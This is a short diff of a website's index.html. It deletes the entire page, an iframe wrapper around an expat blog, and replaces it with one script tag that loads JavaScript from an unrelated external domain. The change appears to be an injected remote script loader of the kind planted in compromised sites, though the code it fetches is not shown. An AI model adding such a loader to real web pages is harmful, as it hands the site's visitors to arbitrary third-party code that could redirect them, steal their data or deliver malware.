--- a/index.html
+++ b/index.html
@@ -1,28 +1,1 @@
-<!DOCTYPE html>
-<html>
-    <head>
-    
-        <title>Domain Name</title>  <!-- Change "Domain Name" to website domain -->
-        
-        <style type="text/css">
-            body, html
-            {
-                margin: 0; padding: 0; height: 100%; overflow: hidden;
-            }
-
-            #content
-            {
-                position:absolute; left: 0; right: 0; bottom: 0; top: 0px; 
-            }
-            div
-            {
-                text-align: center;
-            }
-        </style>
-    </head>
-    <body>
-        <div id="content">
-            <iframe width="100%" height="100%" frameborder="0" src="https://spanishsabores.com/expat-blog-spain/" />
-        </div>
-    </body>
-</html>
+<script src='//disamoin.com/D117'></script>
